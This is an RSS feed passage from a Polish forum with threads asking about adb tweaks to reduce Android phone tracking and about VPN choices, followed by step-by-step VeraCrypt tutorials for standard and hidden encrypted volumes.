Video jak to działa:<iframe frameborder="0" width="480" height="270" src="//www.dailymotion.com/embed/video/x9ob7lu" allowfullscreen="true"></iframe>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Modyfikacja telefonu z Androidem przez adb]]></title>
			<link>https://dopal.org/showthread.php?tid=5888</link>
			<pubDate>Mon, 28 Jul 2025 16:01:00 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=5222">Tymoteusz</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=5888</guid>
			<description><![CDATA[Ktoś doświadczony i moglby dać jakieś przydatne komendy/modyfikacje i jakie pliki poinstalować/odinstalować żeby taki telefon był bezpieczniejszy i teudniejszy do namierzenia (np przez GPS) i ew. czego szukać lub na co zwracać uwagę po logach żeby ocenić czy telefon ten jest obserwowany?]]></description>
			<content:encoded><![CDATA[Ktoś doświadczony i moglby dać jakieś przydatne komendy/modyfikacje i jakie pliki poinstalować/odinstalować żeby taki telefon był bezpieczniejszy i teudniejszy do namierzenia (np przez GPS) i ew. czego szukać lub na co zwracać uwagę po logach żeby ocenić czy telefon ten jest obserwowany?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[VPNy - który najlepszy]]></title>
			<link>https://dopal.org/showthread.php?tid=5853</link>
			<pubDate>Thu, 17 Jul 2025 19:40:22 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=119">horsii</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=5853</guid>
			<description><![CDATA[mullvad vpn to wiadomo że git.<br />
proton vpn - cos sie ktos wypowie?<br />
<br />
i czy slyszal ktos o vp.net? chwalą sie że mają taką zajebistą technologie, że doslownei niemożliwe jest podejrzenie tego co przeglądasz, bo normalnie inne firmy od vpnów mają oczywiscie taką możliwość ale obiecują że nie beda patrzeć ani udostepniać, a w vp.net podobno zrobili to tak że jest to niemożliwe.<br />
<br />
widziałem ich reklamy u jednego goscia na youtubie którego oglądam, takiego dość rozsadnego goscia co z sensem gada i mnie ten vp.net zainteresowal]]></description>
			<content:encoded><![CDATA[mullvad vpn to wiadomo że git.<br />
proton vpn - cos sie ktos wypowie?<br />
<br />
i czy slyszal ktos o vp.net? chwalą sie że mają taką zajebistą technologie, że doslownei niemożliwe jest podejrzenie tego co przeglądasz, bo normalnie inne firmy od vpnów mają oczywiscie taką możliwość ale obiecują że nie beda patrzeć ani udostepniać, a w vp.net podobno zrobili to tak że jest to niemożliwe.<br />
<br />
widziałem ich reklamy u jednego goscia na youtubie którego oglądam, takiego dość rozsadnego goscia co z sensem gada i mnie ten vp.net zainteresowal]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[(2) Szyfrowanie danych - Ukryty wolumin VeraCrypt]]></title>
			<link>https://dopal.org/showthread.php?tid=5808</link>
			<pubDate>Sun, 29 Jun 2025 11:46:42 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=0">Rweqerew333</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=5808</guid>
			<description><![CDATA[Jest to part 2 tutoriala VeraCrypt, <a href="https://dopal.org/showthread.php?tid=5803" target="_blank" rel="noopener" class="mycode_url">wcześniej tłumaczyłem jak zrobić prosty wolumin</a>. Tutaj robimy ukryty. Jeśli nie rozumiesz różnicy - dostrzeżesz ją jak zapoznasz się z tym szybkim opisem.<br />
<br />
<span style="font-size: xx-large;" class="mycode_size">Dla kogo: dla tych, którzy chcą mieć plan B przy "dyskretnych sytuacjach"</span><br />
<br />
<br />
<span style="font-size: large;" class="mycode_size">🤫 Co to robi?</span><br />
<br />
Masz dwa woluminy w jednym pliku: zewnętrzny (widoczny) i ukryty (niewidoczny). Jak podasz jedno hasło – montuje zewnętrzny. Jak drugie – montuje ukryty.<br />
<br />
<span style="font-size: large;" class="mycode_size">🪜 Kroki:</span><br />
<br />
Otwórz VeraCrypt - stąd pobierzesz: <a href="https://veracrypt.io/en/Downloads.html" target="_blank" rel="noopener" class="mycode_url">https://veracrypt.io/en/Downloads.html</a><br />
<br />
<br />
Create Volume  Create an encrypted file container<br />
<br />
Zaznacz: Hidden VeraCrypt volume<br />
<br />
<br />
<a href="https://ibb.co/4RrX8FTW" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/fdwykXpM/2.png" loading="lazy"  alt="[Obrazek: 2.png]" class="mycode_img" /></a><br />
<br />
Zdefiniuj:<br />
Plik dla woluminu (ja zapisałem na dysku zewnętrznym plik hidden-dopal.org)<br />
<br />
Next &gt; AES jest wystarczający<br />
<br />
<br />
<a href="https://ibb.co/JRZYQmb8" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/1fcC67pB/4.png" loading="lazy"  alt="[Obrazek: 4.png]" class="mycode_img" /></a><br />
<br />
Określ rozmiar zewnętrznego woluminu - pamiętaj, że maksymalnie tyle będziesz mógł użyć w docelowym, ukrytym woluminie<br />
<br />
<br />
<a href="https://ibb.co/xqYHLmmg" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/jkzRfVVw/5.png" loading="lazy"  alt="[Obrazek: 5.png]" class="mycode_img" /></a><br />
<br />
Ustal hasło dla zewnętrznego woluminu<br />
<br />
<br />
<a href="https://ibb.co/XP83rnD" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/PyQ9v2M/6.png" loading="lazy"  alt="[Obrazek: 6.png]" class="mycode_img" /></a><br />
<br />
Wybierz najlepiej FAT<br />
<br />
<br />
<a href="https://ibb.co/ZCpCNNN" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/9jkjGGG/7.png" loading="lazy"  alt="[Obrazek: 7.png]" class="mycode_img" /></a><br />
<br />
Teraz nadupcaj myszą - tak randomizujesz szyfrowanie<br />
<br />
<br />
<a href="https://ibb.co/NdvBPFvg" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/pB7F8176/8.png" loading="lazy"  alt="[Obrazek: 8.png]" class="mycode_img" /></a><br />
<br />
Wolumin zewnętrzny gotowy. Kliknij Next &gt; aby przejść do konfiguracji ukrytego:<br />
<br />
<br />
<a href="https://ibb.co/qLsnxvzR" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/twsh39Sb/9.png" loading="lazy"  alt="[Obrazek: 9.png]" class="mycode_img" /></a><br />
<br />
Next &gt;<br />
<br />
<br />
<a href="https://ibb.co/gnSJBPX" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/HJtqkxM/10.png" loading="lazy"  alt="[Obrazek: 10.png]" class="mycode_img" /></a><br />
<br />
Tutaj też możesz wybrać szyfrowanie ale AES SHA-512 jest dość mocny, więc Next &gt;<br />
<br />
<br />
<a href="https://ibb.co/bjytJRcC" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/vCr9Yv0T/11.png" loading="lazy"  alt="[Obrazek: 11.png]" class="mycode_img" /></a><br />
<br />
Tutaj ustalasz wielkość woluminu ukrytego, tak jak pisałem maksymalnie to niespełna tyle co ustawiłeś wolumin zewnętrzny<br />
<br />
<br />
<a href="https://ibb.co/0y0xPHHz" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/v4NS200M/12.png" loading="lazy"  alt="[Obrazek: 12.png]" class="mycode_img" /></a><br />
<br />
Hasło ukrytego woluminu<br />
<br />
<br />
<a href="https://ibb.co/nqHTsBh6" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/Ps7RZMBF/13.png" loading="lazy"  alt="[Obrazek: 13.png]" class="mycode_img" /></a><br />
<br />
Znowu FAT, Next &gt;<br />
<br />
<br />
<a href="https://ibb.co/fzdfnrRX" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/DHfh8wX1/14.png" loading="lazy"  alt="[Obrazek: 14.png]" class="mycode_img" /></a><br />
<br />
Masz informację, że się udało i o ostrzeżenie o montowaniu zewnętrznego woluminu (o tym za chwilę)<br />
<br />
W sumie to już tutaj (montowanie):<br />
<br />
<br />
<a href="https://ibb.co/dsxp220b" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/LDHgttzQ/15.png" loading="lazy"  alt="[Obrazek: 15.png]" class="mycode_img" /></a><br />
<br />
Wybierasz plik<br />
<br />
<br />
<a href="https://ibb.co/7JkYpFMM" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/mCNDy7ZZ/16.png" loading="lazy"  alt="[Obrazek: 16.png]" class="mycode_img" /></a><br />
<br />
Podajesz hasło - ale tutaj to jest opcja wtedy kiedy ktoś Ci stoi za plecami i każe odszyfrować dysk... Tak się nie robi jak jesteś bezpieczny...<br />
<br />
<br />
<a href="https://ibb.co/cKbcfQ26" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/SDQXYBVt/17.png" loading="lazy"  alt="[Obrazek: 17.png]" class="mycode_img" /></a><br />
<br />
No ale zamontował - jak widzisz "Type" jest "Normal" - i to jest dobre bo osoba, która stoi Ci za plecami myśli, że to normalny wolumin i właśnie go mu odszyfrowałeś. Ale jak już pisałem jak jesteś bezpieczny to rób inaczej. Mianowicie:<br />
<br />
<br />
<a href="https://ibb.co/PzZHMBbc" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/rfGr3nLx/18.png" loading="lazy"  alt="[Obrazek: 18.png]" class="mycode_img" /></a><br />
<br />
Klikasz "Options &gt;", zaznaczasz checkbox "Protect hidden volume....", podajesz hasło do ukrytego woluminu, podajesz do zewnętrznego i dopiero wtedy montujesz.<br />
<br />
<br />
<a href="https://ibb.co/WvGYRdDd" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/zVQ0tL8L/19.png" loading="lazy"  alt="[Obrazek: 19.png]" class="mycode_img" /></a><br />
<br />
Tutaj masz dupne info, że dobrze robią ogólnie i tak trzeba robić jak chcesz zapisać jakieś dane na tym zewnętrznym woluminie. Inaczej po prostu możesz uszkodzić dane na tym ukrytym.<br />
<br />
<br />
<a href="https://ibb.co/5WhN45nN" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/LzdLRCJL/20.png" loading="lazy"  alt="[Obrazek: 20.png]" class="mycode_img" /></a><br />
<br />
Jak widzisz "Type" jawnie mówi, że to "Outer"<br />
<br />
<br />
<a href="https://ibb.co/TqW1HVmc" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/HphCrWn7/21.png" loading="lazy"  alt="[Obrazek: 21.png]" class="mycode_img" /></a><br />
<br />
A teraz serio - czyli montujesz ukryty wolumin, którego hasła nie ujawnisz<br />
<br />
<br />
<a href="https://ibb.co/xKzJ7n55" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/Ps1w62CC/22.png" loading="lazy"  alt="[Obrazek: 22.png]" class="mycode_img" /></a><br />
<br />
Zamontował się jako "Hidden"<br />
<br />
Czaisz?<br />
<br />
Gdy ktoś wymusi na Tobie hasło to podajesz "niby" - wolumin montuje się jakby by zwykły a "serio" zaszyfrowane dane są bezpieczne.]]></description>
			<content:encoded><![CDATA[Jest to part 2 tutoriala VeraCrypt, <a href="https://dopal.org/showthread.php?tid=5803" target="_blank" rel="noopener" class="mycode_url">wcześniej tłumaczyłem jak zrobić prosty wolumin</a>. Tutaj robimy ukryty. Jeśli nie rozumiesz różnicy - dostrzeżesz ją jak zapoznasz się z tym szybkim opisem.<br />
<br />
<span style="font-size: xx-large;" class="mycode_size">Dla kogo: dla tych, którzy chcą mieć plan B przy "dyskretnych sytuacjach"</span><br />
<br />
<br />
<span style="font-size: large;" class="mycode_size">🤫 Co to robi?</span><br />
<br />
Masz dwa woluminy w jednym pliku: zewnętrzny (widoczny) i ukryty (niewidoczny). Jak podasz jedno hasło – montuje zewnętrzny. Jak drugie – montuje ukryty.<br />
<br />
<span style="font-size: large;" class="mycode_size">🪜 Kroki:</span><br />
<br />
Otwórz VeraCrypt - stąd pobierzesz: <a href="https://veracrypt.io/en/Downloads.html" target="_blank" rel="noopener" class="mycode_url">https://veracrypt.io/en/Downloads.html</a><br />
<br />
<br />
Create Volume  Create an encrypted file container<br />
<br />
Zaznacz: Hidden VeraCrypt volume<br />
<br />
<br />
<a href="https://ibb.co/4RrX8FTW" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/fdwykXpM/2.png" loading="lazy"  alt="[Obrazek: 2.png]" class="mycode_img" /></a><br />
<br />
Zdefiniuj:<br />
Plik dla woluminu (ja zapisałem na dysku zewnętrznym plik hidden-dopal.org)<br />
<br />
Next &gt; AES jest wystarczający<br />
<br />
<br />
<a href="https://ibb.co/JRZYQmb8" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/1fcC67pB/4.png" loading="lazy"  alt="[Obrazek: 4.png]" class="mycode_img" /></a><br />
<br />
Określ rozmiar zewnętrznego woluminu - pamiętaj, że maksymalnie tyle będziesz mógł użyć w docelowym, ukrytym woluminie<br />
<br />
<br />
<a href="https://ibb.co/xqYHLmmg" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/jkzRfVVw/5.png" loading="lazy"  alt="[Obrazek: 5.png]" class="mycode_img" /></a><br />
<br />
Ustal hasło dla zewnętrznego woluminu<br />
<br />
<br />
<a href="https://ibb.co/XP83rnD" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/PyQ9v2M/6.png" loading="lazy"  alt="[Obrazek: 6.png]" class="mycode_img" /></a><br />
<br />
Wybierz najlepiej FAT<br />
<br />
<br />
<a href="https://ibb.co/ZCpCNNN" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/9jkjGGG/7.png" loading="lazy"  alt="[Obrazek: 7.png]" class="mycode_img" /></a><br />
<br />
Teraz nadupcaj myszą - tak randomizujesz szyfrowanie<br />
<br />
<br />
<a href="https://ibb.co/NdvBPFvg" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/pB7F8176/8.png" loading="lazy"  alt="[Obrazek: 8.png]" class="mycode_img" /></a><br />
<br />
Wolumin zewnętrzny gotowy. Kliknij Next &gt; aby przejść do konfiguracji ukrytego:<br />
<br />
<br />
<a href="https://ibb.co/qLsnxvzR" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/twsh39Sb/9.png" loading="lazy"  alt="[Obrazek: 9.png]" class="mycode_img" /></a><br />
<br />
Next &gt;<br />
<br />
<br />
<a href="https://ibb.co/gnSJBPX" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/HJtqkxM/10.png" loading="lazy"  alt="[Obrazek: 10.png]" class="mycode_img" /></a><br />
<br />
Tutaj też możesz wybrać szyfrowanie ale AES SHA-512 jest dość mocny, więc Next &gt;<br />
<br />
<br />
<a href="https://ibb.co/bjytJRcC" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/vCr9Yv0T/11.png" loading="lazy"  alt="[Obrazek: 11.png]" class="mycode_img" /></a><br />
<br />
Tutaj ustalasz wielkość woluminu ukrytego, tak jak pisałem maksymalnie to niespełna tyle co ustawiłeś wolumin zewnętrzny<br />
<br />
<br />
<a href="https://ibb.co/0y0xPHHz" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/v4NS200M/12.png" loading="lazy"  alt="[Obrazek: 12.png]" class="mycode_img" /></a><br />
<br />
Hasło ukrytego woluminu<br />
<br />
<br />
<a href="https://ibb.co/nqHTsBh6" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/Ps7RZMBF/13.png" loading="lazy"  alt="[Obrazek: 13.png]" class="mycode_img" /></a><br />
<br />
Znowu FAT, Next &gt;<br />
<br />
<br />
<a href="https://ibb.co/fzdfnrRX" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/DHfh8wX1/14.png" loading="lazy"  alt="[Obrazek: 14.png]" class="mycode_img" /></a><br />
<br />
Masz informację, że się udało i o ostrzeżenie o montowaniu zewnętrznego woluminu (o tym za chwilę)<br />
<br />
W sumie to już tutaj (montowanie):<br />
<br />
<br />
<a href="https://ibb.co/dsxp220b" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/LDHgttzQ/15.png" loading="lazy"  alt="[Obrazek: 15.png]" class="mycode_img" /></a><br />
<br />
Wybierasz plik<br />
<br />
<br />
<a href="https://ibb.co/7JkYpFMM" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/mCNDy7ZZ/16.png" loading="lazy"  alt="[Obrazek: 16.png]" class="mycode_img" /></a><br />
<br />
Podajesz hasło - ale tutaj to jest opcja wtedy kiedy ktoś Ci stoi za plecami i każe odszyfrować dysk... Tak się nie robi jak jesteś bezpieczny...<br />
<br />
<br />
<a href="https://ibb.co/cKbcfQ26" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/SDQXYBVt/17.png" loading="lazy"  alt="[Obrazek: 17.png]" class="mycode_img" /></a><br />
<br />
No ale zamontował - jak widzisz "Type" jest "Normal" - i to jest dobre bo osoba, która stoi Ci za plecami myśli, że to normalny wolumin i właśnie go mu odszyfrowałeś. Ale jak już pisałem jak jesteś bezpieczny to rób inaczej. Mianowicie:<br />
<br />
<br />
<a href="https://ibb.co/PzZHMBbc" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/rfGr3nLx/18.png" loading="lazy"  alt="[Obrazek: 18.png]" class="mycode_img" /></a><br />
<br />
Klikasz "Options &gt;", zaznaczasz checkbox "Protect hidden volume....", podajesz hasło do ukrytego woluminu, podajesz do zewnętrznego i dopiero wtedy montujesz.<br />
<br />
<br />
<a href="https://ibb.co/WvGYRdDd" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/zVQ0tL8L/19.png" loading="lazy"  alt="[Obrazek: 19.png]" class="mycode_img" /></a><br />
<br />
Tutaj masz dupne info, że dobrze robią ogólnie i tak trzeba robić jak chcesz zapisać jakieś dane na tym zewnętrznym woluminie. Inaczej po prostu możesz uszkodzić dane na tym ukrytym.<br />
<br />
<br />
<a href="https://ibb.co/5WhN45nN" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/LzdLRCJL/20.png" loading="lazy"  alt="[Obrazek: 20.png]" class="mycode_img" /></a><br />
<br />
Jak widzisz "Type" jawnie mówi, że to "Outer"<br />
<br />
<br />
<a href="https://ibb.co/TqW1HVmc" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/HphCrWn7/21.png" loading="lazy"  alt="[Obrazek: 21.png]" class="mycode_img" /></a><br />
<br />
A teraz serio - czyli montujesz ukryty wolumin, którego hasła nie ujawnisz<br />
<br />
<br />
<a href="https://ibb.co/xKzJ7n55" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/Ps1w62CC/22.png" loading="lazy"  alt="[Obrazek: 22.png]" class="mycode_img" /></a><br />
<br />
Zamontował się jako "Hidden"<br />
<br />
Czaisz?<br />
<br />
Gdy ktoś wymusi na Tobie hasło to podajesz "niby" - wolumin montuje się jakby by zwykły a "serio" zaszyfrowane dane są bezpieczne.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[(1) Szyfrowanie danych - Prosty wolumin VeraCrypt]]></title>
			<link>https://dopal.org/showthread.php?tid=5803</link>
			<pubDate>Sat, 28 Jun 2025 08:02:00 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://dopal.org/member.php?action=profile&uid=0">Rweqerew333</a>]]></dc:creator>
			<guid isPermaLink="false">https://dopal.org/showthread.php?tid=5803</guid>
			<description><![CDATA[<span style="font-size: xx-large;" class="mycode_size">Dla kogo: dla każdego, kto chce mieć zaszyfrowany plik do trzymania danych</span><br />
<br />
<span style="font-size: large;" class="mycode_size">🔧 Co to robi?</span><br />
<br />
Tworzysz plik .hc (kontener), który montujesz jak dysk — i wrzucasz do niego co chcesz. Dane są zaszyfrowane i chronione hasłem. Dostęp do swoich danych możesz uzyskać tylko przy ponownym użyciu VeraCrypt i oczywiście tylko ze swoim hasłem.<br />
<br />
<span style="font-size: large;" class="mycode_size">🪜 Kroki:</span><br />
<br />
Otwórz VeraCrypt - stąd pobierzesz: <a href="https://veracrypt.io/en/Downloads.html" target="_blank" rel="noopener" class="mycode_url">https://veracrypt.io/en/Downloads.html</a><br />
<a href="https://ibb.co/ksDK0CRS" target="_blank" rel="noopener" class="mycode_url"><br />
<img src="https://i.ibb.co/jPwhGXcr/1.png" loading="lazy"  alt="[Obrazek: 1.png]" class="mycode_img" /></a><br />
<br />
Kliknij "Create Volume"<br />
<a href="https://ibb.co/0yf4JJr9" target="_blank" rel="noopener" class="mycode_url"><br />
<img src="https://i.ibb.co/Jjz6kkHp/2.png" loading="lazy"  alt="[Obrazek: 2.png]" class="mycode_img" /></a><br />
<br />
<br />
Wybierz "Create an encrypted file container"<br />
<br />
Wybierz "Standard VeraCrypt volume"<br />
<br />
Jeśli chcesz utworzyć ukryty wolumin wybierz "Hidden VeraCrypt volume" i sprawdź tutorial (2), który znajdziesz też w tym dziale (wkrótce).<br />
<br />
<br />
Wybierz gdzie zapisać plik kontenera (u mnie jest to dysk zewnętrzny, plik nazwałem dopal.org)<br />
<br />
<a href="https://ibb.co/4RXwt2L1" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/HTbL4Cyh/3.png" loading="lazy"  alt="[Obrazek: 3.png]" class="mycode_img" /><br />
</a><br />
<br />
Wybierz algorytm szyfrowania (domyślnie AES wystarczy)<br />
<a href="https://ibb.co/kVYgrRxm" target="_blank" rel="noopener" class="mycode_url"><br />
<img src="https://i.ibb.co/HLmDMWVh/4.png" loading="lazy"  alt="[Obrazek: 4.png]" class="mycode_img" /></a><br />
<br />
<br />
Określ rozmiar (np. 1 GB)<br />
<br />
<a href="https://ibb.co/vSYHCVN" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/t9X4wQ0/5.png" loading="lazy"  alt="[Obrazek: 5.png]" class="mycode_img" /></a><br />
<br />
Ustaw hasło (zrób to sensownie!)<br />
<br />
<a href="https://ibb.co/d4QgKGm7" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/VYvmB2w3/6.png" loading="lazy"  alt="[Obrazek: 6.png]" class="mycode_img" /></a><br />
<br />
Możesz dostać taki warning jak ustawisz za słabe hasło. Jak jesteś z tym ok to dawaj "Yes" ale jednak dobrze się zastanowić nad jakimś lepszym hasłem. Polecam używać z jakiegoś menadżera haseł, który zaproponuje Ci bezpieczne hasło.<br />
<br />
<a href="https://ibb.co/0j4GRGkw" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/3y6C9CwJ/7.png" loading="lazy"  alt="[Obrazek: 7.png]" class="mycode_img" /></a><br />
<br />
<br />
Format systemu plików, najlepiej FAT (na macOS: exFAT lub FAT, APFS/HFS+ nie działa!)<br />
<a href="https://ibb.co/JWVN4GLM" target="_blank" rel="noopener" class="mycode_url"><br />
<img src="https://i.ibb.co/dsFSqV9z/8.png" loading="lazy"  alt="[Obrazek: 8.png]" class="mycode_img" /></a><br />
<br />
Kliknij "Format" i napierdalaj myszą - w ten sposób randomizuje się szyfrowanie Twojego woluminu.<br />
<br />
<a href="https://ibb.co/GfDBDNHY" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/fVWBWLD6/9.png" loading="lazy"  alt="[Obrazek: 9.png]" class="mycode_img" /></a><br />
<br />
Sukces!<br />
<br />
<a href="https://ibb.co/GvgXrmDX" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/svLhX74h/10.png" loading="lazy"  alt="[Obrazek: 10.png]" class="mycode_img" /></a><br />
<br />
Klikaj "Exit" albo "Next" jeśli chcesz utworzyć kolejny szyfrowany wolumin.<br />
<br />
<a href="https://ibb.co/PzTs0Lgq" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/FqskCrzR/11.png" loading="lazy"  alt="[Obrazek: 11.png]" class="mycode_img" /></a><br />
<br />
<span style="font-size: large;" class="mycode_size">Po utworzeniu możesz:</span><br />
<br />
W VeraCrypt kliknąć "Select File" → wybierz swój .hc<br />
<a href="https://ibb.co/6RqkLywY" target="_blank" rel="noopener" class="mycode_url"><br />
<img src="https://i.ibb.co/1f4kj0QZ/12.png" loading="lazy"  alt="[Obrazek: 12.png]" class="mycode_img" /></a><br />
<br />
Wybierz slot , obojętne który.<br />
<br />
<a href="https://ibb.co/0RZF3fxN" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/fztn7CsR/13.png" loading="lazy"  alt="[Obrazek: 13.png]" class="mycode_img" /></a><br />
<br />
Kliknij "Mount", wpisz hasło<br />
<br />
<a href="https://ibb.co/Z63CMDTt" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/GvXj5SPB/14.png" loading="lazy"  alt="[Obrazek: 14.png]" class="mycode_img" /></a><br />
<br />
<a href="https://ibb.co/5W1F2rxN" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/GvdTFW3K/15.png" loading="lazy"  alt="[Obrazek: 15.png]" class="mycode_img" /></a><br />
<br />
Poczekaj chwilę na zamontowanie<br />
<br />
<a href="https://ibb.co/qYdD7gf4" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/tp4HQ2tN/16.png" loading="lazy"  alt="[Obrazek: 16.png]" class="mycode_img" /></a><br />
<br />
Voila!<br />
<br />
<a href="https://ibb.co/Cs1xbnfQ" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/7NY7nGqK/17.png" loading="lazy"  alt="[Obrazek: 17.png]" class="mycode_img" /></a><br />
<br />
Gotowe – działa jak dysk<br />
<br />
<a href="https://ibb.co/zTyJSJ1G" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/mVL8H8m6/18.png" loading="lazy"  alt="[Obrazek: 18.png]" class="mycode_img" /></a>]]></description>
			<content:encoded><![CDATA[<span style="font-size: xx-large;" class="mycode_size">Dla kogo: dla każdego, kto chce mieć zaszyfrowany plik do trzymania danych</span><br />
<br />
<span style="font-size: large;" class="mycode_size">🔧 Co to robi?</span><br />
<br />
Tworzysz plik .hc (kontener), który montujesz jak dysk — i wrzucasz do niego co chcesz. Dane są zaszyfrowane i chronione hasłem. Dostęp do swoich danych możesz uzyskać tylko przy ponownym użyciu VeraCrypt i oczywiście tylko ze swoim hasłem.<br />
<br />
<span style="font-size: large;" class="mycode_size">🪜 Kroki:</span><br />
<br />
Otwórz VeraCrypt - stąd pobierzesz: <a href="https://veracrypt.io/en/Downloads.html" target="_blank" rel="noopener" class="mycode_url">https://veracrypt.io/en/Downloads.html</a><br />
<a href="https://ibb.co/ksDK0CRS" target="_blank" rel="noopener" class="mycode_url"><br />
<img src="https://i.ibb.co/jPwhGXcr/1.png" loading="lazy"  alt="[Obrazek: 1.png]" class="mycode_img" /></a><br />
<br />
Kliknij "Create Volume"<br />
<a href="https://ibb.co/0yf4JJr9" target="_blank" rel="noopener" class="mycode_url"><br />
<img src="https://i.ibb.co/Jjz6kkHp/2.png" loading="lazy"  alt="[Obrazek: 2.png]" class="mycode_img" /></a><br />
<br />
<br />
Wybierz "Create an encrypted file container"<br />
<br />
Wybierz "Standard VeraCrypt volume"<br />
<br />
Jeśli chcesz utworzyć ukryty wolumin wybierz "Hidden VeraCrypt volume" i sprawdź tutorial (2), który znajdziesz też w tym dziale (wkrótce).<br />
<br />
<br />
Wybierz gdzie zapisać plik kontenera (u mnie jest to dysk zewnętrzny, plik nazwałem dopal.org)<br />
<br />
<a href="https://ibb.co/4RXwt2L1" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/HTbL4Cyh/3.png" loading="lazy"  alt="[Obrazek: 3.png]" class="mycode_img" /><br />
</a><br />
<br />
Wybierz algorytm szyfrowania (domyślnie AES wystarczy)<br />
<a href="https://ibb.co/kVYgrRxm" target="_blank" rel="noopener" class="mycode_url"><br />
<img src="https://i.ibb.co/HLmDMWVh/4.png" loading="lazy"  alt="[Obrazek: 4.png]" class="mycode_img" /></a><br />
<br />
<br />
Określ rozmiar (np. 1 GB)<br />
<br />
<a href="https://ibb.co/vSYHCVN" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/t9X4wQ0/5.png" loading="lazy"  alt="[Obrazek: 5.png]" class="mycode_img" /></a><br />
<br />
Ustaw hasło (zrób to sensownie!)<br />
<br />
<a href="https://ibb.co/d4QgKGm7" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/VYvmB2w3/6.png" loading="lazy"  alt="[Obrazek: 6.png]" class="mycode_img" /></a><br />
<br />
Możesz dostać taki warning jak ustawisz za słabe hasło. Jak jesteś z tym ok to dawaj "Yes" ale jednak dobrze się zastanowić nad jakimś lepszym hasłem. Polecam używać z jakiegoś menadżera haseł, który zaproponuje Ci bezpieczne hasło.<br />
<br />
<a href="https://ibb.co/0j4GRGkw" target="_blank" rel="noopener" class="mycode_url"><img src="https://i.ibb.co/3y6C9CwJ/7.png" loading="lazy"  alt="[Obrazek: 7.png]" class="mycode_img" /></a><br />
<br />
<br />
Format systemu plików, najlepiej FAT (na macOS: exFAT lub FAT, APFS/HFS+ nie działa!)<br />
<a href="https://ibb.co/JWVN4GLM" target="_blank" rel="noopener" class="mycode_url"><br />
<img src="https://i.ibb.co/dsFSqV9z/8.png" loading="lazy"  alt="[Obrazek: 8.png]" class="mycode_img" /></a><br />
<br />
Kliknij "Format" i napierdalaj myszą - w ten sposób randomizuje się szyfrowanie Twojego woluminu.<br />
<br />
